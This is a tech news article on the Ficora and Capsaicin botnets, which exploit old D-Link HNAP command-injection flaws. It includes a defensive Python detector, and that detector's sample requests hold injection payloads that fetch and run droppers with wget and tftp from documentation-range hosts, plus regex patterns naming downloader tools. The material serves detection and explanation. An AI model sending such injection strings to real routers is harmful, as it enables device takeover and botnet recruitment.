
Ficora and Capsaicin botnet exploit decade-old D-Link flaws


There was a significant uptick in the activity of two distinct botnets, the Mirai variant 'Ficora' and the Kaiten variant 'Capsaicin', over October and November 2024. Both botnets exploit long-documented vulnerabilities in D-Link routers that allow attackers to execute arbitrary commands through the devices' Home Network Administration Protocol (HNAP) interface.

This exploitation underscores the enduring risks of unpatched vulnerabilities, some dating back nearly a decade.

The HNAP weakness has been a known threat vector for years and is tracked under CVE-2015-2051, CVE-2019-10891, CVE-2022-37056 and CVE-2024-33112. Patches have long been available, so the continued prevalence of these attacks points to a broader problem of neglected firmware updates and device maintenance.

The 'Ficora' botnet has been the more widespread of the two, with attack traffic originating from two servers in the Netherlands, IP addresses 185[.]191[.]126[.]213 and 185[.]191[.]126[.]248. Rather than a targeted campaign, 'Ficora' is a global threat that infects devices indiscriminately across multiple regions.

FICORA telemetry. | Source: Fortinet

The botnet propagates through a downloader shell script named 'multi'. The script uses several fetch tools ('wget', 'ftpget', 'curl' and 'tftp') to retrieve the malware and then executes the build that matches the victim's CPU; builds exist for a range of Linux architectures including ARM, MIPS, PowerPC and SPARC, among others.
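The two observable traits described above, command injection through the HNAP interface and a dropper that pulls its payload with wget, ftpget, curl or tftp, are what a network defender can actually look for. The following detector is an added example written for this article, not code from Fortinet or from the botnets themselves. It runs a simple rule over constructed sample HTTP requests (the IP addresses, paths and command strings are made up for illustration): a request to the HNAP endpoint whose SOAPAction header or body contains shell metacharacters or a downloader tool name is flagged, while ordinary HNAP queries and unrelated traffic are not.

```python
import re

# Constructed sample HTTP requests against a router's management interface (not
# captured telemetry). Each dict carries the fields an access log or IDS would
# expose: source IP, method, path, SOAPAction header and request body.
SAMPLE_REQUESTS = [
    # Legitimate HNAP query from the LAN-side management client.
    {"src": "192.0.2.20", "method": "POST", "path": "/HNAP1/",
     "soapaction": '"http://purenetworks.com/HNAP1/GetDeviceSettings"', "body": ""},
    # SOAPAction carrying a command substitution that fetches and runs a dropper
    # (the general shape of the HNAP command-injection bugs the article lists).
    {"src": "203.0.113.11", "method": "POST", "path": "/HNAP1/",
     "soapaction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/'
                   '`cd /tmp; wget http://198.51.100.5/multi; sh multi`"',
     "body": ""},
    # Same idea, but the injection sits in the SOAP body instead of the header.
    {"src": "203.0.113.12", "method": "POST", "path": "/HNAP1/",
     "soapaction": '"http://purenetworks.com/HNAP1/SetDeviceSettings"',
     "body": "<SetDeviceSettings><DeviceName>$(tftp -g -r bins.sh 198.51.100.6)"
             "</DeviceName></SetDeviceSettings>"},
    # Mentions 'curl' on a non-HNAP path: outside the rule's scope, so no alert.
    {"src": "192.0.2.21", "method": "POST", "path": "/forum/post",
     "soapaction": "", "body": "try curl -I example.com"},
]

# Only the HNAP endpoint is in scope for this rule.
HNAP_PATH = re.compile(r"^/HNAP1(/|$)", re.I)
# Shell metacharacters that have no business inside a SOAPAction URI or HNAP XML.
SHELL_META = re.compile(r"[`;|&]|\$\(")
# Fetch tools the article names in the 'multi' and 'bins.sh' droppers.
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget|busybox)\b", re.I)


def classify(req):
    """Return a reason string if the request looks like HNAP command injection,
    or None if it is in scope but benign, or out of scope entirely."""
    if not HNAP_PATH.match(req["path"]):
        return None
    for field in ("soapaction", "body"):
        value = req.get(field, "")
        if SHELL_META.search(value):
            reason = f"shell metacharacter in {field}"
            tool = DOWNLOADER.search(value)
            if tool:
                reason += f" invoking {tool.group(1).lower()}"
            return reason
        if DOWNLOADER.search(value):
            # Weaker signal: a fetch tool named without obvious injection syntax.
            return f"downloader tool name in {field}"
    return None


def scan(requests):
    """Run classify() over a batch and return one alert per flagged request."""
    return [{"src": r["src"], "reason": reason}
            for r in requests if (reason := classify(r))]


if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert)
```

Restricting the rule to the HNAP path keeps the false-positive rate low; the same metacharacter check applied to every request body would fire on ordinary web traffic. In production the rule belongs in the IPS or proxy in front of the router, since a device vulnerable to these CVEs cannot be trusted to log the request itself.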

'Ficora' encrypts its configuration, which includes its command-and-control (C2) server domain and a unique identifier, with the ChaCha20 algorithm. It also carries brute-force functionality with hard-coded username and password lists for spreading to other devices.

To keep infected devices to itself, the malware kills processes belonging to competing malware, such as those whose names contain 'dvrHelper'. As with other Mirai derivatives, 'Ficora' exists to run distributed denial-of-service (DDoS) attacks, with flood capabilities over UDP, TCP and DNS.

Unlike Ficora, the Capsaicin botnet showed an intense but brief burst of activity on 21 and 22 October 2024, mostly against targets in East Asian countries. It is delivered by a shell script named 'bins.sh' and is built for a similar range of Linux architectures as Ficora.

CAPSAICIN telemetry. | Source: Fortinet

Upon execution, the malware prints a string containing its own name. 'Capsaicin' then connects to its C2 server at 192[.]110[.]247[.]46 and sends the host's operating system information along with a designated nickname. Commands from the server drive its functions, which include launching DDoS attacks and killing rival botnets on the device.

Analysis indicates that 'Capsaicin' derives from botnet versions attributed to the Keksec group; the sample identifies itself as version 17.0.0. The malware even embeds help messages describing its command parameters, a convenience for whoever operates it.

Researchers have urged organisations to keep device firmware and kernels up to date, to deploy intrusion prevention systems (IPS) with signatures that detect and block the exploitation traffic, and to monitor network activity comprehensively. Where a device no longer receives firmware updates, the only real fix is replacement; in the meantime, the HNAP and other management interfaces should not be reachable from the WAN.


Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me